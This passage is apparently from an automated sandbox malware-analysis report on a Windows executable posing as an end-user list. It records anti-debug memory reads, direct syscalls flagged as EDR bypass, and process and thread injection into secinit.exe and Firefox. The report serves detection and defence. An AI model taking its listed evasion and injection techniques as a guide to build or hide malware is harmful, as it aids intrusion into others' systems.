                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013369C0 mov eax, dword ptr fs:[00000030h]2_2_013369C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D49D0 mov eax, dword ptr fs:[00000030h]2_2_012D49D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134483A mov eax, dword ptr fs:[00000030h]2_2_0134483A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134483A mov eax, dword ptr fs:[00000030h]2_2_0134483A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2835 mov ecx, dword ptr fs:[00000030h]2_2_012C2835
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA830 mov eax, dword ptr fs:[00000030h]2_2_012DA830
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132C810 mov eax, dword ptr fs:[00000030h]2_2_0132C810
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132E872 mov eax, dword ptr fs:[00000030h]2_2_0132E872
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132E872 mov eax, dword ptr fs:[00000030h]2_2_0132E872
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01336870 mov eax, dword ptr fs:[00000030h]2_2_01336870
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01336870 mov eax, dword ptr fs:[00000030h]2_2_01336870
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B2840 mov ecx, dword ptr fs:[00000030h]2_2_012B2840
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4859 mov eax, dword ptr fs:[00000030h]2_2_012A4859
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4859 mov eax, dword ptr fs:[00000030h]2_2_012A4859
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D0854 mov eax, dword ptr fs:[00000030h]2_2_012D0854
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0887 mov eax, dword ptr fs:[00000030h]2_2_012A0887
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132C89D mov eax, dword ptr fs:[00000030h]2_2_0132C89D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136A8E4 mov eax, dword ptr fs:[00000030h]2_2_0136A8E4
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC8F9 mov eax, dword ptr fs:[00000030h]2_2_012DC8F9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC8F9 mov eax, dword ptr fs:[00000030h]2_2_012DC8F9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE8C0 mov eax, dword ptr fs:[00000030h]2_2_012CE8C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013708C0 mov eax, dword ptr fs:[00000030h]2_2_013708C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CEB20 mov eax, dword ptr fs:[00000030h]2_2_012CEB20
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CEB20 mov eax, dword ptr fs:[00000030h]2_2_012CEB20
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01368B28 mov eax, dword ptr fs:[00000030h]2_2_01368B28
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01368B28 mov eax, dword ptr fs:[00000030h]2_2_01368B28
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374B00 mov eax, dword ptr fs:[00000030h]2_2_01374B00
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129CB7E mov eax, dword ptr fs:[00000030h]2_2_0129CB7E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134EB50 mov eax, dword ptr fs:[00000030h]2_2_0134EB50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01336B40 mov eax, dword ptr fs:[00000030h]2_2_01336B40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01336B40 mov eax, dword ptr fs:[00000030h]2_2_01336B40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136AB40 mov eax, dword ptr fs:[00000030h]2_2_0136AB40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01348B42 mov eax, dword ptr fs:[00000030h]2_2_01348B42
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01298B50 mov eax, dword ptr fs:[00000030h]2_2_01298B50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01354B4B mov eax, dword ptr fs:[00000030h]2_2_01354B4B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01354B4B mov eax, dword ptr fs:[00000030h]2_2_01354B4B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01354BB0 mov eax, dword ptr fs:[00000030h]2_2_01354BB0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01354BB0 mov eax, dword ptr fs:[00000030h]2_2_01354BB0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0BBE mov eax, dword ptr fs:[00000030h]2_2_012B0BBE
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0BBE mov eax, dword ptr fs:[00000030h]2_2_012B0BBE
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132CBF0 mov eax, dword ptr fs:[00000030h]2_2_0132CBF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CEBFC mov eax, dword ptr fs:[00000030h]2_2_012CEBFC
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8BF0 mov eax, dword ptr fs:[00000030h]2_2_012A8BF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8BF0 mov eax, dword ptr fs:[00000030h]2_2_012A8BF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8BF0 mov eax, dword ptr fs:[00000030h]2_2_012A8BF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134EBD0 mov eax, dword ptr fs:[00000030h]2_2_0134EBD0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C0BCB mov eax, dword ptr fs:[00000030h]2_2_012C0BCB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C0BCB mov eax, dword ptr fs:[00000030h]2_2_012C0BCB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C0BCB mov eax, dword ptr fs:[00000030h]2_2_012C0BCB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0BCD mov eax, dword ptr fs:[00000030h]2_2_012A0BCD
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0BCD mov eax, dword ptr fs:[00000030h]2_2_012A0BCD
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0BCD mov eax, dword ptr fs:[00000030h]2_2_012A0BCD
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CEA2E mov eax, dword ptr fs:[00000030h]2_2_012CEA2E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DCA24 mov eax, dword ptr fs:[00000030h]2_2_012DCA24
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C4A35 mov eax, dword ptr fs:[00000030h]2_2_012C4A35
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C4A35 mov eax, dword ptr fs:[00000030h]2_2_012C4A35
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132CA11 mov eax, dword ptr fs:[00000030h]2_2_0132CA11
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DCA6F mov eax, dword ptr fs:[00000030h]2_2_012DCA6F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DCA6F mov eax, dword ptr fs:[00000030h]2_2_012DCA6F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DCA6F mov eax, dword ptr fs:[00000030h]2_2_012DCA6F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131CA72 mov eax, dword ptr fs:[00000030h]2_2_0131CA72
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131CA72 mov eax, dword ptr fs:[00000030h]2_2_0131CA72
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134EA60 mov eax, dword ptr fs:[00000030h]2_2_0134EA60
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0A5B mov eax, dword ptr fs:[00000030h]2_2_012B0A5B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0A5B mov eax, dword ptr fs:[00000030h]2_2_012B0A5B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8AA0 mov eax, dword ptr fs:[00000030h]2_2_012A8AA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8AA0 mov eax, dword ptr fs:[00000030h]2_2_012A8AA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012F6AA4 mov eax, dword ptr fs:[00000030h]2_2_012F6AA4
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374A80 mov eax, dword ptr fs:[00000030h]2_2_01374A80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory written: C:\Users\user\Desktop\022QCX_End_User_List_2025.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: NULL target: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\secinit.exeThread register set: target process: 5592Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\secinit.exeThread APC queued: target process: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess created: C:\Users\user\Desktop\022QCX_End_User_List_2025.exe "C:\Users\user\Desktop\022QCX_End_User_List_2025.exe"Jump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: gJe493hPOgj2OnF5.exe, 00000006.00000000.1981374838.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939601029.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000002.2939849611.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: gJe493hPOgj2OnF5.exe, 00000006.00000000.1981374838.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939601029.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000002.2939849611.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: gJe493hPOgj2OnF5.exe, 00000006.00000000.1981374838.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939601029.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000002.2939849611.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: gJe493hPOgj2OnF5.exe, 00000006.00000000.1981374838.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939601029.0000000001271000.00000002.00000001.00040000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000002.2939849611.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Users\user\Desktop\022QCX_End_User_List_2025.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
